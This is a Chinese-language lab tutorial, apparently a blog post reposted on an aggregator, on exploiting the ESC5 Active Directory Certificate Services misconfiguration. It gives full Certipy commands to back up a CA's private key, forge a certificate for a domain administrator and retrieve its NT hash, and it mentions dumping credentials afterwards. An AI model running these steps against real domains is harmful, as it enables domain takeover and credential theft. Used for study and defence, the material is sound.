当前位置: 首页 > news >正文

深入解析ESC5 ADCS配置漏洞利用——活动目录渗透测试实战

摘要

继我之前写的ESC4文章之后——现在我的工作完成了,终于有更多时间学习,我想我也要深入研究一下ESC5。说实话,我不知道为什么,但学习活动目录(Active Directory)利用感觉起来更令人兴奋,尽管在印度尼西亚的真实环境中仍然相当罕见。可能只是我理想主义的一面吧,哈哈哈。好了,让我们开始一起学习吧。

什么是ESC5

ESC5是一种针对活动目录证书服务(ADCS)的攻击。这种攻击利用了对证书颁发机构(CA)的访问权限。如果攻击者获得了CA服务器上的本地管理员权限,就可以提取CA证书及其私钥。利用该私钥,攻击者可以为特权账户(如域管理员)伪造恶意证书。然后,这些伪造的证书可用于通过PKINIT向AD进行身份验证并请求TGT(票据授予票据)。

搭建实验室

创建一个任意名称的账户,并将该账户添加为CA服务器(DC01)上的本地管理员:

net localgroup Administrators "igniteraj" /add
net localgroup Administrators

(按回车或点击查看完整大小的图片)

枚举与利用

使用Certipy在CA服务器上以本地管理员账户枚举证书。
(按回车或点击查看完整大小的图片)
(按回车或点击查看完整大小的图片)

使用Certipy备份CA证书和私钥。

certipy ca -backup -u alex.doe@sandbox.local -p "MyPassword123" -ca ignite-DC-CA -target 10.100.150.10

伪造我们想要接管的账户——在本例中是administrator@sandbox.local,因为它是我的目标上的域管理员。

certipy forge -ca-pfx 'sandbox-ca.pfx' -upn administrator@sandbox.local

使用Certipy获取administrator@sandbox.local账户的NT哈希。

certipy auth -pfx administrator_forged.pfx -dc-ip 10.100.150.10

(按回车或点击查看完整大小的图片)
(按回车或点击查看完整大小的图片)

使用SecretDump导出哈希凭据。
(按回车或点击查看完整大小的图片)

参考资料

  • https://www.hackingarticles.in/ad-cs-esc5-vulnerable-pki-object-access-control/
  • https://mayfly277.github.io/posts/ADCS-part14/
  • https://www.vaadata.com/blog/ad-cs-security-understanding-and-exploiting-esc-techniques/
    CSD0tFqvECLokhw9aBeRqixLzx0482UkkKWM4rJX2T+9qXDLcUYQal3W1ykfQ9si0pulG6s9/0h/hW8d28k1SsX8sObhJabP00Qx1uju62JSdqgDv8XWiIQ1stSnFOlB/q2Fi82D6F6LlOrFptzcOg==
    更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
    对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

公众号二维码

公众号二维码

http://www.jsqmd.com/news/92494/

相关文章:

  • 儿童屏幕时间管控学习引导系统,核心功能,绑定设备,设时长与时段,识别娱乐,APP超时锁屏,推荐益智内容,生成使用报告,学习达标解锁娱乐
  • python 之 文件管理
  • AI 驱动的软件测试全栈解决方案:自动化框架、智能缺陷检测与 A/B 测试优化
  • 空间变化偏振的产生
  • 26、调试 Shell 程序的实用方法
  • 10、网络安全漏洞利用与攻击技术详解
  • 科学训练提升孩子学习能力
  • 智能制造的分布式认知系统要素分析
  • LLM应用实践: NoteBookLM初次使用
  • 《51测试天地》电子杂志 第八十七期发布文章:命令行参数的 3 种实战用法
  • 在线招生宣传视频制作:内容优化与转化提升技巧
  • 11、网络渗透测试中的常见攻击技术解析
  • C++ 对象 核心介绍
  • 2025年12月高压细水雾泵组,档案室高压细水雾,高压细水雾设备厂商推荐:聚焦消防装备企业综合实力与核心竞争力 - 品牌鉴赏师
  • 2025年评价高的拖拉机旋耕机/施肥旋耕机一体机厂家最新权威实力榜 - 行业平台推荐
  • 2025年12月干雾抑尘,双流体干雾抑尘,干雾抑尘主机厂商推荐:聚焦企业综合实力与核心竞争力 - 品牌鉴赏师
  • 【机器学习】3.PCA降维与SVD
  • 2025年评价高的固定矿车最新TOP品牌厂家排行 - 行业平台推荐
  • 为啥小设备能塞下这么多功能?盲埋孔PCB藏玄机
  • 1、Kali Linux Web渗透测试指南
  • 4、AWS与Google Cloud Platform存储及服务详解
  • 【机器学习】1.决策树(Decision Tree)
  • 2025优质抖音直播运营公司推荐榜:新媒体运营、短视频培训、短视频运营、抖音代运营、抖音信息流、抖音关键词排名、抖音广告 - 优质品牌商家
  • 2025年中国企业官网建设十大品牌综合实力榜 数字时代企业门户建设服务商权威评测 - 匠子网络
  • 2、搭建Kali Linux测试环境全攻略
  • 探索未来汽车核心:新能源汽车动力系统MR实训软件
  • 【机器学习】案例1.1——决策树进行非线性回归任务(正弦曲线拟合)
  • 打卡信奥刷题(2540)用C++实现信奥 P2070 [USACO13JAN] 刷墙 Painting the Fence B
  • 3、渗透测试侦察阶段技术指南
  • 2025六安新能源汽车升级改装企业TOP5权威推荐:实力强企 - myqiye